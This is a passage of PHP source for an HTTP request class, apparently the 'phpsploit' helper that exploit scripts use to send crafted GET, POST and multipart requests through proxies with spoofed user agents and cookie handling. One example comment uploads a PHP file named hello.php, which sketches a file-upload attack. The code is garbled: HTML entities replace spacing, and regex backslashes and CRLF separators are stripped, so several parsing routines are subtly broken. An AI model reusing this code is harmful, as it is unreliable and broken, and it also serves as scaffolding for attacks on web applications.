&nbsp;*&nbsp;$this->addheader(\"headername:&nbsp;headervalue\"); &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$headername &nbsp;*&nbsp;@param&nbsp;string&nbsp;$headervalue &nbsp;*/ public&nbsp;function&nbsp;addheader($headern,$headervalue=\'\') { //&nbsp;$this->addheader(\"name\",\"value\"); if(!empty($headervalue)) { if(!empty($this->header)) { if(preg_match(\"/$headern:/\",$this->header)) { $this->header&nbsp;=&nbsp;preg_replace(\"/$headern:&nbsp;(S*)/\",\"$headern:&nbsp;$headervalue\",$this->header); } else { $this->header&nbsp;.=&nbsp;\" \".$headern.\":&nbsp;\".$headervalue; } } else { $this->header=$headern.\":&nbsp;\".$headervalue; } } //&nbsp;$this->addheader(\"name:&nbsp;value\"); else&nbsp; { if(!empty($this->header)) { $headarr&nbsp;=&nbsp;explode(\":&nbsp;\",$headern); $headern&nbsp;=&nbsp;$headarr[0]; $headerv&nbsp;=&nbsp;$headarr[1]; $this->addheader($headern,$headerv); } else { $this->header=$headern; } } } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;use&nbsp;an&nbsp;http&nbsp;proxy&nbsp;server. &nbsp;*&nbsp;Several&nbsp;methods&nbsp;are&nbsp;supported: &nbsp;*&nbsp; &nbsp;*&nbsp;$this->proxy(\"proxyip\",\"8118\"); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->proxy(\"proxyip:8118\") &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$proxyhost &nbsp;*&nbsp;@param&nbsp;integer&nbsp;$proxyport &nbsp;*/ public&nbsp;function&nbsp;proxy($proxy,$proxyp=\'\') { //&nbsp;$this->proxy(\"localhost:8118\"); if(empty($proxyp)) { preg_match(\"/^(S*):(d+)$/\",$proxy,$proxarr); $proxh&nbsp;=&nbsp;$proxarr[1]; $proxp&nbsp;=&nbsp;$proxarr[2]; $this->proxyhost=$proxh; $this->proxyport=$proxp; } //&nbsp;$this->proxy(\"localhost\",8118); else&nbsp; { $this->proxyhost=$proxy; $this->proxyport=intval($proxyp); } if($this->proxyport&nbsp;>&nbsp;65535)&nbsp;die(\"Error:&nbsp;Invalid&nbsp;port&nbsp;number\"); } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;use&nbsp;an&nbsp;http&nbsp;proxy&nbsp;server &nbsp;*&nbsp;which&nbsp;requires&nbsp;a&nbsp;basic&nbsp;authentification.&nbsp;Several &nbsp;*&nbsp;methods&nbsp;are&nbsp;supported: &nbsp;*&nbsp; &nbsp;*&nbsp;$this->proxyauth(\"darkfig\",\"dapasswd\"); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->proxyauth(\"darkfig:dapasswd\"); &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$proxyuser &nbsp;*&nbsp;@param&nbsp;string&nbsp;$proxypass &nbsp;*/ public&nbsp;function&nbsp;proxyauth($proxyauth,$proxypasse=\'\') { //&nbsp;$this->proxyauth(\"darkfig:password\"); if(empty($proxypasse)) { preg_match(\"/^(.*):(.*)$/\",$proxyauth,$proxautharr); $proxu&nbsp;=&nbsp;$proxautharr[1]; $proxp&nbsp;=&nbsp;$proxautharr[2]; $this->proxyuser=$proxu; $this->proxypass=$proxp; } //&nbsp;$this->proxyauth(\"darkfig\",\"password\"); else { $this->proxyuser=$proxyauth; $this->proxypass=$proxypasse; } } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;set&nbsp;the&nbsp;\"User-Agent\"&nbsp;header. &nbsp;*&nbsp;Several&nbsp;methods&nbsp;are&nbsp;possible&nbsp;to&nbsp;do&nbsp;that: &nbsp;*&nbsp; &nbsp;*&nbsp;$this->agent(\"Mozilla&nbsp;Firefox\"); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->addheader(\"User-Agent:&nbsp;Mozilla&nbsp;Firefox\"); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->addheader(\"User-Agent\",\"Mozilla&nbsp;Firefox\"); &nbsp;*&nbsp; &nbsp;*&nbsp;@param&nbsp;string&nbsp;$useragent &nbsp;*/ public&nbsp;function&nbsp;agent($useragent) { $this->agent=$useragent; } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;header&nbsp;which&nbsp;will&nbsp;be &nbsp;*&nbsp;in&nbsp;the&nbsp;next&nbsp;request. &nbsp;*&nbsp; &nbsp;*&nbsp;$this->showheader(); &nbsp;* &nbsp;*&nbsp;@return&nbsp;$header &nbsp;*/ public&nbsp;function&nbsp;showheader() { return&nbsp;$this->header; } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;cookie&nbsp;which&nbsp;will&nbsp;be &nbsp;*&nbsp;in&nbsp;the&nbsp;next&nbsp;request. &nbsp;*&nbsp; &nbsp;*&nbsp;$this->showcookie(); &nbsp;* &nbsp;*&nbsp;@return&nbsp;$storedcookies &nbsp;*/ public&nbsp;function&nbsp;showcookie() { return&nbsp;$this->cookie; } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;last&nbsp;formed &nbsp;*&nbsp;http&nbsp;request&nbsp;(the&nbsp;http&nbsp;packet). &nbsp;*&nbsp; &nbsp;*&nbsp;$this->showlastrequest(); &nbsp;*&nbsp; &nbsp;*&nbsp;@return&nbsp;$last_http_request &nbsp;*/ public&nbsp;function&nbsp;showlastrequest() { return&nbsp;$this->packet; } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;sends&nbsp;the&nbsp;formed&nbsp;http&nbsp;packet&nbsp;with&nbsp;the &nbsp;*&nbsp;GET&nbsp;method.&nbsp;You&nbsp;can&nbsp;precise&nbsp;the&nbsp;port&nbsp;of&nbsp;the&nbsp;host. &nbsp;*&nbsp; &nbsp;*&nbsp;$this->get(\"http://localhost\"); &nbsp;*&nbsp;$this->get(\"http://localhost:888/xd/tst.php\"); &nbsp;*&nbsp; &nbsp;*&nbsp;@param&nbsp;string&nbsp;$urlwithpath &nbsp;*&nbsp;@return&nbsp;$server_response &nbsp;*/ public&nbsp;function&nbsp;get($url) { $this->target($url); $this->method=\"get\"; return&nbsp;$this->sock(); } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;sends&nbsp;the&nbsp;formed&nbsp;http&nbsp;packet&nbsp;with&nbsp;the &nbsp;*&nbsp;POST&nbsp;method.&nbsp;You&nbsp;can&nbsp;precise&nbsp;the&nbsp;port&nbsp;of&nbsp;the&nbsp;host. &nbsp;*&nbsp; &nbsp;*&nbsp;$this->post(\"http://localhost/index.php\",\"admin=1&user=dark\"); &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$urlwithpath &nbsp;*&nbsp;@param&nbsp;string&nbsp;$postdata &nbsp;*&nbsp;@return&nbsp;$server_response &nbsp;*/ public&nbsp;function&nbsp;post($url,$data) { $this->target($url); $this->method=\"post\"; $this->data=$data; return&nbsp;$this->sock(); } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;sends&nbsp;the&nbsp;formed&nbsp;http&nbsp;packet&nbsp;with&nbsp;the &nbsp;*&nbsp;POST&nbsp;method&nbsp;using&nbsp;the&nbsp;multipart/form-data&nbsp;enctype.&nbsp; &nbsp;*&nbsp; &nbsp;*&nbsp;$array&nbsp;=&nbsp;array( &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_url&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\"http://localhost/upload.php\", &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_boundary&nbsp;=>&nbsp;\"123456\",&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;Optional &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"email\"&nbsp;=>&nbsp;\"me@u.com\", &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"varname\"&nbsp;=>&nbsp;array( &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_type&nbsp;=>&nbsp;\"image/gif\",&nbsp;&nbsp;&nbsp;#&nbsp;Optional &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_transfert&nbsp;=>&nbsp;\"binary\",&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;Optional &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_filename&nbsp;=>&nbsp;\"hello.php\", &nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_content&nbsp;=>&nbsp;\"<?php&nbsp;echo&nbsp;\':)\';&nbsp;?>\")); &nbsp;*&nbsp;$this->formdata($array); &nbsp;* &nbsp;*&nbsp;@param&nbsp;array&nbsp;$array &nbsp;*&nbsp;@return&nbsp;$server_response &nbsp;*/ public&nbsp;function&nbsp;formdata($array) { $this->target($array[frmdt_url]); $this->method=\"formdata\"; $this->data=\'\'; if(!isset($array[frmdt_boundary]))&nbsp;$this->boundary=\"phpsploit\"; else&nbsp;$this->boundary=$array[frmdt_boundary]; foreach($array&nbsp;as&nbsp;$key&nbsp;=>&nbsp;$value) { if(!preg_match(\"#^frmdt_(boundary|url)#\",$key)) { $this->data&nbsp;.=&nbsp;\"-----------------------------\".$this->boundary.\" \"; $this->data&nbsp;.=&nbsp;\"Content-Disposition:&nbsp;form-data;&nbsp;name=\"\".$key.\"\";\"; if(!is_array($value)) { $this->data&nbsp;.=&nbsp;\" \".$value.\" \"; } else { $this->data&nbsp;.=&nbsp;\"&nbsp;filename=\"\".$array[$key][frmdt_filename].\"\"; \"; if(isset($array[$key][frmdt_type]))&nbsp;$this->data&nbsp;.=&nbsp;\"Content-Type:&nbsp;\".$array[$key][frmdt_type].\" \"; if(isset($array[$key][frmdt_transfert]))&nbsp;$this->data&nbsp;.=&nbsp;\"Content-Transfer-Encoding:&nbsp;\".$array[$key][frmdt_transfert].\" \"; $this->data&nbsp;.=&nbsp;\" \".$array[$key][frmdt_content].\" \"; } } } $this->data&nbsp;.=&nbsp;\"-----------------------------\".$this->boundary.\"-- \"; return&nbsp;$this->sock(); } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;content&nbsp;of&nbsp;the&nbsp;server&nbsp;response &nbsp;*&nbsp;without&nbsp;the&nbsp;headers. &nbsp;*&nbsp; &nbsp;*&nbsp;$this->getcontent($this->get(\"http://localhost/\")); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->getcontent(); &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$server_response &nbsp;*&nbsp;@return&nbsp;$onlythecontent &nbsp;*/ public&nbsp;function&nbsp;getcontent($code=\'\') { if(empty($code))&nbsp;$code&nbsp;=&nbsp;$this->recv; $content&nbsp;=&nbsp;explode(\" \",$code); $onlycode&nbsp;=&nbsp;\'\'; for($i=1;$i<count($content);$i++) { if(!preg_match(\"/^(S*):/\",$content[$i]))&nbsp;$ok&nbsp;=&nbsp;1; if($ok)&nbsp;$onlycode&nbsp;.=&nbsp;$content[$i].\" \"; } return&nbsp;$onlycode; } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;headers&nbsp;of&nbsp;the&nbsp;server&nbsp;response &nbsp;*&nbsp;without&nbsp;the&nbsp;content. &nbsp;*&nbsp; &nbsp;*&nbsp;$this->getheader($this->post(\"http://localhost/x.php\",\"x=1&z=2\")); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->getheader(); &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$server_response &nbsp;*&nbsp;@return&nbsp;$onlytheheaders &nbsp;*/ public&nbsp;function&nbsp;getheader($code=\'\') { if(empty($code))&nbsp;$code&nbsp;=&nbsp;$this->recv; $header&nbsp;=&nbsp;explode(\" \",$code); $onlyheader&nbsp;=&nbsp;$header[0].\" \"; for($i=1;$i<count($header);$i++) { if(!preg_match(\"/^(S*):/\",$header[$i]))&nbsp;break; $onlyheader&nbsp;.=&nbsp;$header[$i].\" \"; } return&nbsp;$onlyheader; } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;is&nbsp;called&nbsp;by&nbsp;the&nbsp;cookiejar()&nbsp;function. &nbsp;*&nbsp;It&nbsp;adds&nbsp;the&nbsp;value&nbsp;of&nbsp;the&nbsp;\"Set-Cookie\"&nbsp;header&nbsp;in&nbsp;the&nbsp;\"Cookie\" &nbsp;*&nbsp;header&nbsp;for&nbsp;the&nbsp;next&nbsp;request.&nbsp;You&nbsp;don\'t&nbsp;have&nbsp;to&nbsp;call&nbsp;it. &nbsp;*&nbsp; &nbsp;*&nbsp;@param&nbsp;string&nbsp;$server_response &nbsp;*/ private&nbsp;function&nbsp;getcookie($code) { $carr&nbsp;=&nbsp;explode(\" \",str_replace(\" \",\" \",$code)); for($z=0;$z<count($carr);$z++) { if(preg_match(\"/set-cookie:&nbsp;(.*)/i\",$carr[$z],$cookarr)) { $cookie[]&nbsp;=&nbsp;preg_replace(\"/expires=(.*)(GMT||UTC)(S*)$/i\",\"\",preg_replace(\"/path=(.*)/i\",\"\",$cookarr[1])); } } for($i=0;$i<count($cookie);$i++) { preg_match(\"/(S*)=(S*)(|;)/\",$cookie[$i],$matches); &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$cookn&nbsp;=&nbsp;$matches[1]; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$cookv&nbsp;=&nbsp;$matches[2]; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->addcookie($cookn,$cookv); } &nbsp;&nbsp;&nbsp;&nbsp;} /** &nbsp;*&nbsp;This&nbsp;function&nbsp;is&nbsp;called&nbsp;by&nbsp;the&nbsp;get()/post()&nbsp;functions. &nbsp;*&nbsp;You&nbsp;don\'t&nbsp;have&nbsp;to&nbsp;call&nbsp;it. &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$urltarg &nbsp;*/ private&nbsp;function&nbsp;target($urltarg) { if(!preg_match(\"/^http://(.*)//\",$urltarg))&nbsp;$urltarg&nbsp;.=&nbsp;\"/\"; $this->url=$urltarg; $array&nbsp;=&nbsp;explode(\"/\",str_replace(\"http://\",\"\",preg_replace(\"/:(d+)/\",\"\",$urltarg))); $this->host=$array[0]; preg_match(\"/:(d+)//\",$urltarg,$matches); $this->port=empty($matches[1])&nbsp;?&nbsp;80&nbsp;:&nbsp;$matches[1]; $temp&nbsp;=&nbsp;str_replace(\"http://\",\"\",preg_replace(\"/:(d+)/\",\"\",$urltarg)); preg_match(\"//(.*)//\",$temp,$matches); $this->path=str_replace(\"//\",\"/\",\"/\".$matches[1].\"/\"); if($this->port&nbsp;>&nbsp;65535)&nbsp;die(\"Error:&nbsp;Invalid&nbsp;port&nbsp;number\"); } /** &nbsp;*&nbsp;If&nbsp;you&nbsp;call&nbsp;this&nbsp;function,&nbsp;the&nbsp;script&nbsp;will &nbsp;*&nbsp;extract&nbsp;all&nbsp;\"Set-Cookie\"&nbsp;headers&nbsp;values &nbsp;*&nbsp;and&nbsp;it&nbsp;will&nbsp;automatically&nbsp;add&nbsp;them&nbsp;into&nbsp;the&nbsp;\"Cookie\"&nbsp;header &nbsp;*&nbsp;for&nbsp;all&nbsp;next&nbsp;requests. &nbsp;* &nbsp;*&nbsp;$this->cookiejar(1);&nbsp;//&nbsp;enabled &nbsp;*&nbsp;$this->cookiejar(0);&nbsp;//&nbsp;disabled &nbsp;*&nbsp; &nbsp;*/ public&nbsp;function&nbsp;cookiejar($code) { if($code===0)&nbsp;$this->cookiejar=\'\'; if($code===1)&nbsp;$this->cookiejar=1; else { $this->getcookie($code); } } /** &nbsp;*&nbsp;If&nbsp;you&nbsp;call&nbsp;this&nbsp;function,&nbsp;the&nbsp;script&nbsp;will &nbsp;*&nbsp;follow&nbsp;all&nbsp;redirections&nbsp;sent&nbsp;by&nbsp;the&nbsp;server. &nbsp;*&nbsp; &nbsp;*&nbsp;$this->allowredirection(1);&nbsp;//&nbsp;enabled &nbsp;*&nbsp;$this->allowredirection(0);&nbsp;//&nbsp;disabled &nbsp;*&nbsp; &nbsp;*&nbsp;@return&nbsp;$this->get($locationresponse) &nbsp;*/ public&nbsp;function&nbsp;allowredirection($code) { if($code===0)&nbsp;$this->allowredirection=\'\'; if($code===1)&nbsp;$this->allowredirection=1; else { if(preg_match(\"/(location|content-location|uri):&nbsp;(.*)/i\",$code,$codearr)) { $location&nbsp;=&nbsp;str_replace(chr(13),\'\',$codearr[2]); if(!eregi(\"://\",$location)) { return&nbsp;$this->get(\"http://\".$this->host.$this->path.$location); } else { return&nbsp;$this->get($location); } } else { return&nbsp;$code; } } } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;reset&nbsp;some&nbsp;parameters: &nbsp;*&nbsp; &nbsp;*&nbsp;$this->reset(header);&nbsp;//&nbsp;headers&nbsp;cleaned &nbsp;*&nbsp;$this->reset(cookie);&nbsp;//&nbsp;cookies&nbsp;cleaned &nbsp;*&nbsp;$this->reset();&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;clean&nbsp;all&nbsp;parameters &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$func &nbsp;*/ public&nbsp;function&nbsp;reset($func=\'\') { switch($func) { case&nbsp;\"header\": $this->header=\'\'; break; case&nbsp;\"cookie\": $this->cookie=\'\'; break; default: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->cookiejar=\'\'; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->header=\'\'; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->cookie=\'\'; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->allowredirection=\'\';&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->agent=\'\'; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break; } } } ?> &nbsp;